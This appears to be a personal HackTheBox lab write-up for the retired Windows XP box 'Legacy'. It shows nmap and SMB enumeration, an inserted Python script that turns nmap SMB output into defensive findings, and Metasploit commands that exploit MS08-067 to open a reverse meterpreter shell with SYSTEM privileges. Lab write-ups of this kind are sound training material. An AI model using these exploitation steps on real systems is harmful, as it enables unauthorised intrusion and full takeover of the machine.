HackTheBox: Legacy
01/13/2024
This is the second retired Windows box I'll be doing, after [[Blue]]. I'm shamelessly following writeups and Guided mode just to get as much exposure as I can in as little time as possible, as a crash course of sorts. Once I'm more comfortable with this OS I'll do more boxes on my own.
Enumeration
Three ports open per nmap:
1) msrpc on 135
2) netbios-ssn on 139
3) microsoft-ds on 445
Script scan gives us a few pieces of useful information. Less significantly, the hostname is legacy.
More significantly, it reveals some juicy information about the SMB server on 139. First, the group name is HTB. Second, anonymous login is allowed.
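As an added example (my own, not part of the original writeup), here is a small Python triage script that parses the SMB host-script blocks of nmap -sC output, the same blocks that reveal the hostname, workgroup and anonymous login above, and turns them into defender findings. The scan text embedded below is constructed in nmap's output format, not the actual scan of the box.

```python
import re

# Constructed sample in the style of "nmap -sC" host script output for a host
# like this one (not the real scan from the writeup).
SAMPLE_NMAP = """\
Host script results:
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\\x00
|   Workgroup: HTB\\x00
|_  System time: 2024-01-13T12:00:00-05:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
"""

# OS families whose Server service is affected by MS08-067 (CVE-2008-4250).
MS08_067_OS = ("windows 2000", "windows xp", "windows server 2003")

def parse_smb_scripts(text):
    """Return {script_name: {key: value}} for each '| script:' block."""
    scripts, current = {}, None
    for line in text.splitlines():
        header = re.match(r"^\|\s([\w-]+):\s*$", line)        # "| smb-os-discovery:"
        if header:
            current = scripts.setdefault(header.group(1), {})
            continue
        kv = re.match(r"^\|_?\s{2,}([^:]+):\s*(.*)$", line)     # "|   Workgroup: HTB"
        if kv and current is not None:
            # strip the NetBIOS padding nmap prints as a literal "\x00"
            current[kv.group(1).strip()] = kv.group(2).strip().replace("\\x00", "")
    return scripts

def triage(text):
    """Map the parsed script output to a list of (severity, finding) tuples."""
    s = parse_smb_scripts(text)
    osd, sec = s.get("smb-os-discovery", {}), s.get("smb-security-mode", {})
    findings = []
    if any(old in osd.get("OS", "").lower() for old in MS08_067_OS):
        findings.append(("critical", f"{osd.get('OS')} is end-of-life and in scope for MS08-067 (CVE-2008-4250); isolate or decommission"))
    if sec.get("account_used") in ("guest", "<blank>"):
        findings.append(("high", "SMB accepted an unauthenticated (null/guest) session; disable anonymous access"))
    if sec.get("message_signing", "").startswith("disabled"):
        findings.append(("medium", "SMB signing disabled; require signing to block tampering/relay"))
    if osd.get("Workgroup"):
        findings.append(("info", f"host {osd.get('Computer name')} is in workgroup {osd['Workgroup']}"))
    return findings

if __name__ == "__main__":
    for sev, msg in triage(SAMPLE_NMAP):
        print(f"[{sev}] {msg}")
```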
Enumerating SMB (netbios-ssn)
I'll use impacket's smbclient to connect to the SMB server:
$ impacket-smbclient 10.10.10.4
# login
[*] USER Session Granted
# shares
[-] SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)
huh...
I'm not spending a lot of time floundering around like a beached fish here. I'm just going to use the writeup, since I know fuck all about Binbows BP
The writeup somehow deduced from the nmap scan that the box might be vulnerable to CVE-2008-4250 (MS08-067), which has a metasploit module. This is an RCE vuln made possible by a buffer overflow in the RPC interface of the Windows Server service.
Exploiting CVE-2008-4250
msf6 > use exploit/windows/smb/ms08_067_netapi
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > set RHOSTS 10.10.10.4
RHOSTS => 10.10.10.4
msf6 exploit(windows/smb/ms08_067_netapi) > set LHOST 10.10.14.24
LHOST => 10.10.14.24
msf6 exploit(windows/smb/ms08_067_netapi) > exploit
[*] Started reverse TCP handler on 10.10.14.24:4444
[*] 10.10.10.4:445 - Automatically detecting the target...
[*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.10.10.4:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175686 bytes) to 10.10.10.4
[*] Meterpreter session 1 opened (10.10.14.24:4444 -> 10.10.10.4:1035) at 2023-10-13 16:29:49 -0400
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM